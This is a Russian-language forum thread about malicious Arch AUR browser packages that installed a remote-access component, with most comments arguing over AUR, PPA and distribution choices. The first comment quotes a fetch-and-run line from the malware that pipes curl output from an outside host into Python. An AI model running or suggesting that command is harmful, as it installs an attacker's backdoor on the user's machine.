The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы
правила/FAQ
поиск
регистрация
вход/выход
слежка
RSS


"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных пакета"  +/
Сообщение от opennews (??), 01-Авг-25, 22:35 
В репозитории AUR (Arch User Repository), применяемом в Arch Linux для распространения пакетов от сторонних разработчиков, продолжилась публикация вредоносного кода, интегрированного в пакеты с неофициальными сборками браузеров. В дополнение к выявленным две недели назад вредоносным пакетам  firefox-patch-bin, librewolf-fix-bin и zen-browser-patched-bin, в AUR был добавлен пакет google-chrome-stable, также содержащий изменение, устанавливающее вредоносный компонент, предоставляющий удалённый доступ к системе...

Подробнее: https://www.opennet.me/opennews/art.shtml?num=63662

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения [Сортировка по времени | RSS]


1. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +4 +/
Сообщение от Аноним (1), 01-Авг-25, 22:35 
> python -c "$(curl https://segs.lol/9wUb1Z)"

LOL!

Ответить | Правка | Наверх | Cообщить модератору

2. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +14 +/
Сообщение от Аноним (2), 01-Авг-25, 22:36 
В AUR-репозитории выявлен безвредный пакет.
Ответить | Правка | Наверх | Cообщить модератору

57. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  –2 +/
Сообщение от Аноним (57), 02-Авг-25, 08:51 
Aur, сами делают вирус.
Чтобы выпускать багфиксы.
Или что то вроде антиаирусов.
Ответить | Правка | Наверх | Cообщить модератору

113. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +1 +/
Сообщение от Аноним (113), 02-Авг-25, 14:33 
Кек, давно таких шизов не видел. Хоть ты и потешный, но всё-таки выпей таблетки.
Ответить | Правка | Наверх | Cообщить модератору

144. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:22 
> Кек, давно таких шизов не видел.

Просто читай местные комментарии чаще.

Ответить | Правка | Наверх | Cообщить модератору

143. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:21 
Что-то вроде антиквариусов. Это как архивариусы, только без амфореусов.
Ответить | Правка | К родителю #57 | Наверх | Cообщить модератору

3. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Анонимemail (3), 01-Авг-25, 22:49 
Вредоносных программ под Linux всё больше и больше. Но правда они чаще всего атакуют пользователей работают из-под рута.
Ответить | Правка | Наверх | Cообщить модератору

5. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (5), 01-Авг-25, 22:52 
виноват в первую очередь сам пользователь

Главное написать Не ставить ЭТОТ пакет.. и пользователь поставит.

Ведь всю помойку тянут на ПК.. всю!

Ответить | Правка | Наверх | Cообщить модератору

48. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:08 
Гениально! В винде вирусы и трояны устанавливаются из-под админа - "дырявая система", то же самое в лине - "но правда для запуска требуется рут"..
Ответить | Правка | К родителю #3 | Наверх | Cообщить модератору

88. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (88), 02-Авг-25, 12:04 
Надо ставить DrWeb
Ответить | Правка | Наверх | Cообщить модератору

100. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:50 
Я о двойных стандартах. То, что винду считают дырявой, но если линь делает ровно то же, то это норма..
Ответить | Правка | Наверх | Cообщить модератору

130. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (-), 02-Авг-25, 16:18 
Ты передёргиваешь. Линукс безопасен. Описанное в новости поведение вредителя на Windows OS делается вполне легально. Винда вполне легально делает скриншот твоего рабочего стола и отправляет его на свои сервера. И никто по этому поводу не возникает, потому что вредительство прописано в лицензионном договоре.
Ответить | Правка | Наверх | Cообщить модератору

145. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:26 
Не делает, если ты не захочешь. А если делает, то никуда не отправляет. У вас просто очень большие глаза. Это из-за плохих дешёвых экранов и трудночитаемых шрифтов.
Ответить | Правка | Наверх | Cообщить модератору

106. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (106), 02-Авг-25, 12:59 
Это - другое! ))
Ответить | Правка | К родителю #48 | Наверх | Cообщить модератору

146. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:26 
Особый вид местной гениальности, да.
Ответить | Правка | К родителю #48 | Наверх | Cообщить модератору

4. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  –1 +/
Сообщение от Аноним (5), 01-Авг-25, 22:49 
Так можно туннели бекдором до SSH кидать и компом чужим управлять..

Ответить | Правка | Наверх | Cообщить модератору

75. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 10:31 
На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.
Ответить | Правка | Наверх | Cообщить модератору

101. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:52 
А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?
Да уж, уровень экспертности зашкаливает.. 😆
Ответить | Правка | Наверх | Cообщить модератору

107. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от olelukoie (ok), 02-Авг-25, 13:20 
М-да? А если еще раз подумать? В нормальных дистрибутивах (open)ssh-client(s) и (open)ssh-server - это разные пакеты и если надо подключаться к удаленному хосту по ssh, а свой сервер поднимать не требуется, то ставится только пакет 'client'.

> На домашнем (и служебном) компьютере SSH делать нечего. Хотя во всех Ubuntu и его форках ставится по умолчанию. Мое личное мнение (не навязываю), что SSH - это для удаленного управления сервером.

Если есть статический IP, то ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит). Так что наличие ssh на домашнем компе не такая уж ненужная вещь. А про рабочий комп в "офисе", если он переведен на "отечественную" ОС или любой другой Linux, то ssh - один из очень немногих способов админам управлять рабочими местами сотрудников, так что ssh-сервер тоже весьма вероятно будет нужен.

Ответить | Правка | Наверх | Cообщить модератору

118. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 14:49 
> ssh - удобный способ подключения к собственному домашнему компу издалека (с дачи, из командировки, с курорта и т.п.; разумеется, дома должен быть кто-то, кто этот комп включит и затем выключит)

Против такого трудно что-то возразить. Ставьте, заходите. Только я бы при острой нужде подключился по RDP.

Ответить | Правка | Наверх | Cообщить модератору

116. "В AUR-репозитории Arch Linux выявлены ещё 3 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 14:48 
> А как ты собрался связываться с сервером, если на устройстве, с которого ты хочешь подключиться к серверу, ssh нет?

Не могу представить себе бухгалтера, который в минутку для отдыха от работы в 1С решил зайти по SSH на сервер. В нормальном учреждении пользователи работают с определенным набором приложений. Всё. Об админах не говорим - там другое дело. Да, и админу нечего делать на компьютере пользователя через SSH.

Ответить | Правка | К родителю #101 | Наверх | Cообщить модератору

6. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Аноним (6), 01-Авг-25, 22:58 
И что теперь делать?
Ответить | Правка | Наверх | Cообщить модератору

7. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +13 +/
Сообщение от Аноним (7), 01-Авг-25, 23:10 
Читать пкгбилды аура перед запуском.

Правда в мире, где половина инновационного софта ставится через curl |sudo sh , будет затруднительно отличить вирус от нормального софта.

Ответить | Правка | Наверх | Cообщить модератору

49. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –3 +/
Сообщение от Anonimm (?), 02-Авг-25, 08:11 
> Читать пкгбилды

Нормальные системы ставятся через "Далее" и только в лине для установки программ нужно быть ещё и программистом..

Ответить | Правка | Наверх | Cообщить модератору

64. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (64), 02-Авг-25, 09:25 
Для быта Линукс даже не мёртв, а не зачат.
Ответить | Правка | Наверх | Cообщить модератору

78. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 10:40 
Разработанные мной программы под Linux ставятся, как Вы выразились, через "Далее" с помощью InstallJammer.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

147. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:30 
Что за программы? Хочу поставить. Хотелось бы получить полный список со ссылками.
Ответить | Правка | Наверх | Cообщить модератору

89. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:04 
Так Арч не для домохозяек, а для опытных Линукс пользователей, с разморозкой.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

102. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:53 
А вот и разделение на сорта подъехало..
Ответить | Правка | Наверх | Cообщить модератору

114. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 14:41 
Так зайди на офф сайт арча и почитай об этом! Писать все горазды.
Ответить | Правка | Наверх | Cообщить модератору

148. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:37 
Я домохозяин. Несколько лет на Арче сидел. Ничем принципиально не отличается от Убунты, кроме того, что всё-таки нужно почитать мануалы и больше печатать в терминале. Да и то, это больше касается процесса установки, чем последующего повседневного использования. А так, что тот линукс, что этот на десктопе как на корове седло.
Ответить | Правка | К родителю #89 | Наверх | Cообщить модератору

90. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (88), 02-Авг-25, 12:06 
Установить антивирус.
Во всех нормальных магазинах приложений для Андроид есть встроенный.
Ответить | Правка | К родителю #49 | Наверх | Cообщить модератору

103. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 12:54 
Какая взаимосвязь между pkgbuild и Android?
Ответить | Правка | Наверх | Cообщить модератору

149. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от кантикариус (?), 02-Авг-25, 20:39 
Прямая. Андроид - это линукс? Или нет?
Ответить | Правка | Наверх | Cообщить модератору

16. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от НяшМяш (ok), 02-Авг-25, 00:12 
Клонить репы себе на машину, удалять .git, проверять PKGBUILD и самому поддерживать. Иногда даже получается проще, потому что меинтейнеры оригинальных пакетов часто слоупочат версии обновлять.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

26. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (113), 02-Авг-25, 02:33 
В дополнение к вышеупомянутому ОБЯЗАТЕЛЬНОМУ чтению PKGBUILD'ов. Наверное не ставить пакеты с идиотскими названиями, от васяна с нулевым аккаунтом. А также заглядывать в комментарии AUR странички, главное, чтобы они тоже не были идиотскими, от васяна с нулевым аккаунтом.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

28. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Bottle (?), 02-Авг-25, 02:50 
Читать исходники? Поборники свободы сами что-то не желают ей пользоваться на постоянке - они хотят, чтобы за них работали БЕСПЛАТНО.
Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

50. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 08:12 
Интересно, а для андроида и айфона они тоже исходники читают?
Вспомнил - ведь "это другое".. 😆
Ответить | Правка | Наверх | Cообщить модератору

59. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от dannyD (?), 02-Авг-25, 08:58 
сходи на f-droid почитай.
Ответить | Правка | Наверх | Cообщить модератору

91. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:06 
Потому-то здесь троллей и навалом, ибо не понимают разницы между виндой и дистрибутивами Линукс.
Ответить | Правка | К родителю #28 | Наверх | Cообщить модератору

104. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Anonimm (?), 02-Авг-25, 12:56 
> не понимают разницы между виндой и дистрибутивами Линукс.

Как выяснилось - никакой..

Ответить | Правка | Наверх | Cообщить модератору

8. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –17 +/
Сообщение от zionist (ok), 01-Авг-25, 23:13 
Arch всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования.
Ответить | Правка | Наверх | Cообщить модератору

9. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (9), 01-Авг-25, 23:18 
В аур пакеты проверяются сообществом и исходники открыты, что снижает риски. А вот что творится в сторонних пользовательских репозиториях других систем, например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно. Разница лишь в прозрачности
Ответить | Правка | Наверх | Cообщить модератору

13. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –6 +/
Сообщение от Аноним (13), 01-Авг-25, 23:34 
>снижает риски

Снижають, снижають, милок, не боись! Новость читал?

Ответить | Правка | Наверх | Cообщить модератору

15. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +6 +/
Сообщение от Аноним (9), 02-Авг-25, 00:05 
снижают, но не исключают. бабуль, ложись спать
Ответить | Правка | Наверх | Cообщить модератору

29. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Ubuntoid (?), 02-Авг-25, 04:44 
Врать нехорошо!

Можно спокойно посмотреть исходник конкретного пакета из PPA. То что ты не знаешь как посмотреть нужную информацию и при этом что-то пишешь - это уже клиника.

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

34. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:40 
1) ты копируешь команду с лаунчпада и запускаешь у себя, кому ты тут пытаешься мозги пудрить?
2) ты качаешь бинари с лаунчпада, какая вообще разница, что там в рецептах сборки?
Ответить | Правка | Наверх | Cообщить модератору

84. Скрыто модератором  –1 +/
Сообщение от Аноним (84), 02-Авг-25, 11:51 
Ответить | Правка | Наверх | Cообщить модератору

76. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (76), 02-Авг-25, 10:31 
понадобилось как-то пересобрать пакет из сторонних реп, так там даже их патчи не наложились, потому что были от другой версии.
Посмотреть исходник могу, а собрать не могу. А они могут, но явно не с теми патчами, что распространяют
Ответить | Правка | К родителю #29 | Наверх | Cообщить модератору

51. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Anonimm (?), 02-Авг-25, 08:15 
> исходники открыты

То есть простой пользователь (а линь ведь так и рекламируют) должен быть ещё и программистом? Неудивительно, что у вас 4% фанатов..

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

122. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (113), 02-Авг-25, 15:08 
Чтобы посмотреть в PKGBUILD куда ведут ссылки на исходники/бинари, не нужно быть программистом. Достаточно не быть идиотом.
Ответить | Правка | Наверх | Cообщить модератору

123. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от zionist (ok), 02-Авг-25, 15:17 
> Чтобы посмотреть в PKGBUILD куда ведут ссылки на исходники/бинари, не нужно быть
> программистом. Достаточно не быть идиотом.

Вот идиоты и составляют большинство Arch комьюнити.

Ответить | Правка | Наверх | Cообщить модератору

125. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (113), 02-Авг-25, 15:20 
Подкрепил бы свой наброс статистикой что ли. Ах, да ты же его из своих влажных фантазий выудил.
Ответить | Правка | Наверх | Cообщить модератору

127. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от zionist (ok), 02-Авг-25, 15:22 
> Подкрепил бы свой наброс статистикой что ли. Ах, да ты же его
> из своих влажных фантазий выудил.

Мне было достаточно опыта личного общения с их токсичным сообществом.

Ответить | Правка | Наверх | Cообщить модератору

79. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (75), 02-Авг-25, 10:43 
> например в PPA у Ubuntu, часто остаётся за кадром-- там тоже может быть что угодно

Конечно, может, и не остается за кадром, а выпячивается. Deadbeef, например. Более того, он в некоторых дистрибутивах ставился по умолчанию, и этот мусор вместе с его репами и другим мусором приходилось вычищать после установки.

Ответить | Правка | К родителю #9 | Наверх | Cообщить модератору

11. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +6 +/
Сообщение от Аноним (11), 01-Авг-25, 23:31 
Аур это такой же арч, как ppa дебиан.
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

17. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от НяшМяш (ok), 02-Авг-25, 00:13 
Аур лучше, исходники прямо в вебморде можно посмотреть. Как там у ппа с отображением рецепта сборки?
Ответить | Правка | Наверх | Cообщить модератору

80. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (75), 02-Авг-25, 10:48 
Вы знаете, ppa все-таки лучше snap. Недавно попробовал поставить Nextcoud при установке сервера Ubuntu. Поковырявшись час с настройками (настройки SQL, память для PHP, файловое хранилище на нестандартных пользовательских ресурсах), снес его вместе со snap, и без проблем установил с сайта разработчика.
Ответить | Правка | Наверх | Cообщить модератору

27. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от penetrator (?), 02-Авг-25, 02:40 
а в арче без AUR можно жить?

кстати что там с Packman ему можно доверять?

Ответить | Правка | К родителю #11 | Наверх | Cообщить модератору

54. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (54), 02-Авг-25, 08:43 
>а в арче без AUR можно жить?

Можно, иногда надо будет дружить с git.

>кстати что там с Packman ему можно доверять?

Что еще за Packman? Нет в Арче никакого Packman.

Ответить | Правка | Наверх | Cообщить модератору

83. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от penetrator (?), 02-Авг-25, 11:34 
конечно нету это SUSE

второй вопрос про репу а не про арч

Ответить | Правка | Наверх | Cообщить модератору

66. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (64), 02-Авг-25, 09:28 
Он точки поедает.
Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

68. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (68), 02-Авг-25, 09:39 
>а в арче без AUR можно жить?

А зачем вообще эта помойка нужна? Поставить какую-то хипстоту? У меня вот только оф.репы, хватает всего с головой. Что не так?

Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

129. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (54), 02-Авг-25, 16:03 
>А зачем вообще эта помойка нужна? Поставить какую-то хипстоту? У меня вот только оф.репы, хватает всего с головой. Что не так?

В AUR есть всякие специфические драйвера, которые ставятся оттуда без особого гугления. В AUR есть софт, отсутствующий в офрепах, например plex-media-server, или тот же firefox-esr.

Ну и по теме, то что обнаружили заразу через несколько часов - играет только в плюс. Есть продукты, где такое сидит годами.

Ответить | Правка | Наверх | Cообщить модератору

109. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (109), 02-Авг-25, 14:14 
>кстати что там с Packman ему можно доверять?

Прецедентов не было.
Но англоязычное сообщество в ТГ не рекомендует.
Там за flatpak топят.

Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

117. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от ProfessorNavigator (ok), 02-Авг-25, 14:48 
> а в арче без AUR можно жить?

Да, без проблем. Или самому PKGBUILDы писать, или просто из исходников ставить. Можно и без этого обойтись - в официальных репозиториях в принципе есть много чего.

Ответить | Правка | К родителю #27 | Наверх | Cообщить модератору

31. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:15 
> zionist всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования

поправил

Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

124. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –1 +/
Сообщение от zionist (ok), 02-Авг-25, 15:19 
>> zionist всё больше и больше демонстрирует свою никчёмность для хоть сколько нибудь серьёзного использования
> поправил

Используют холопов, вроде тебя. Поэтому не проецируй своё холопское на нормальных людей.

Ответить | Правка | Наверх | Cообщить модератору

131. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 17:13 
рабам слова не давали, иди работай
Ответить | Правка | Наверх | Cообщить модератору

71. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (71), 02-Авг-25, 10:15 
Valve использует Arch - УЖЕ на нём зарабатывают деньги! KDE к нему присматриваются.
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

98. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от Аноним (57), 02-Авг-25, 12:37 
> Valve использует Arch - УЖЕ на нём зарабатывают деньги! KDE к нему присматриваются.

1xBet

Ответить | Правка | Наверх | Cообщить модератору

92. Скрыто модератором  +/
Сообщение от Пояснительная бригада (?), 02-Авг-25, 12:09 
Ответить | Правка | К родителю #8 | Наверх | Cообщить модератору

126. Скрыто модератором  +/
Сообщение от zionist (ok), 02-Авг-25, 15:20 
Ответить | Правка | Наверх | Cообщить модератору

10. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –5 +/
Сообщение от freeperson (?), 01-Авг-25, 23:30 
Arch стал уже стал попсой, как винда, что его таргетят кулхацкеры ежедневно. AUR это та ещё помойка, где никто не проверяет ничего. Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.
Ответить | Правка | Наверх | Cообщить модератору

14. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (14), 02-Авг-25, 00:04 
Гентушникам тоже ухо держать востро в отношении к оверлеям.
Ответить | Правка | Наверх | Cообщить модератору

32. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:29 
разумеется, но:
1) гентушников тупо меньше и оверлеи им нужны гораздо реже, чем AUR на арче, и для настолько специфичного софта, что пропихивать туда малварь тупо не окупится
2) это гента со всеми вытекающими, поди заставь свою попсовую малварь там работать: у кого-то musl, у кого-то openrc, у кого-то, прости господи, шланг, даже версии питона у всех разные
Ответить | Правка | Наверх | Cообщить модератору

58. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от dannyD (?), 02-Авг-25, 08:53 
>>гентушников тупо меньше

это с какого пальца?

может чем бубунтят и меньше,но с рачеводами я бы еще сильно поспорил.

Ответить | Правка | Наверх | Cообщить модератору

72. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 10:25 
да тупо судя по количеству попсовых пакетов. поди попробуй собери хоть один слайсер на генту, хоть оверлеями, хоть без

мне пришлось вырезать половину месы, чтобы кура запустилась

Ответить | Правка | Наверх | Cообщить модератору

85. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от dannyD (?), 02-Авг-25, 11:54 
>>да тупо судя по количеству попсовых пакетов.

ошибка статистической выборки.

ну не надо гентушникам это, я вот даже не знаю о чем вы, коллега.

Ответить | Правка | Наверх | Cообщить модератору

140. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (140), 02-Авг-25, 19:52 
куры нет в репе 24.04 LTS - я немного охренел от такого (в дебиане то все есть), пришлось собрать из более младшенького - работает... но вот от того куда скатился "самый человечный десктоп дистр" я немного удивился...
Ответить | Правка | К родителю #72 | Наверх | Cообщить модератору

24. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (113), 02-Авг-25, 02:16 
> AUR это та ещё помойка, где никто не проверяет ничего.
> Вредоносный пакет был удалён администраторами AUR через несколько часов после появления.

Держи в курсе.

> ставьте Слаку или Gentoo, и будет вам счастье.

Не ставьте свое "ненужно", ставьте мое "ненужно"!!!1!1

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

33. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от 12yoexpert (ok), 02-Авг-25, 05:33 
поддерживаю как гентушник, лет 7 сидевший на арче
Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

141. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (141), 02-Авг-25, 19:52 
> Чувакам "I use arch btw": ставьте Слаку или Gentoo, и будет вам счастье.

Я выбирал между Слакой и Арчем. От Слаки отказался только из-за отсутствия отслеживания зависимостей пакетов.
Думал про Генту или ЛФС, но там читать слишком много, я хоть и безработный на сегодняшний день, но времени на это не хватает.

Ответить | Правка | К родителю #10 | Наверх | Cообщить модератору

20. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Аноним (20), 02-Авг-25, 01:02 
AUR удобно использовать как источник готовых инструкций для сборки пакетов которых нет в BLFS.
Ответить | Правка | Наверх | Cообщить модератору

38. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (38), 02-Авг-25, 06:07 
Чем это отличается от npm?
Ответить | Правка | Наверх | Cообщить модератору

41. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +1 +/
Сообщение от Анониматор (?), 02-Авг-25, 07:10 
Это всё Манждаро виноват. Понаставят pamac-aur и всё, считают что AUR это часть Арча, прозрачная установка "из магазина".
Хотя уже много где в сети написано что они дурачье и не надо делать так. Но если кому-то нравится рисковать - это конечно ваше дело, но не надо свои проблемы триангулировать на всех
Ответить | Правка | Наверх | Cообщить модератору

46. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –4 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:55 
> считают что AUR это часть Арча

Так убери у Арча AUR и он превратится в маргинальный дистрибутив, которым пользуются три калеки.

А если AUR использовать, то это ЗверьCD скачай бесплатно без SMS.

Ответить | Правка | Наверх | Cообщить модератору

47. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (47), 02-Авг-25, 08:05 
ты назвал маргинальщиной такие дистрибутивы как RHEL с клонами и многими другими. Они тоже без епеля (ppa и т.д.) ничто. AUR скорее всего уйдет в тень, потому что тенденция всё недостающее ставить из флатхаба, а это по наполнению тоже как говорится "найди 3 отличия от AUR", так что Арч и тут не выделяется среди других "маргинальностью"
Ответить | Правка | Наверх | Cообщить модератору

42. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  –2 +/
Сообщение от ЖИРОПЕРДЯСТИК (?), 02-Авг-25, 07:10 
Да изначально было понятно, что AUR - это помойка. Любой Васян туда может прийти и понапихать бэкдоров в пакеты.
Ответить | Правка | Наверх | Cообщить модератору

52. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +2 +/
Сообщение от Аноним (47), 02-Авг-25, 08:16 
Таких васянов там сразу отлавливают, этот и полдня не продержался. Отличная работа
Ответить | Правка | Наверх | Cообщить модератору

77. "В AUR-репозитории Arch Linux выявлены ещё 6 вредоносных паке..."  +/
Сообщение от Аноним (77), 02-Авг-25, 10:38 
Не совсем. Поскольку у них нет премодерации пакетов от не пойми кого.
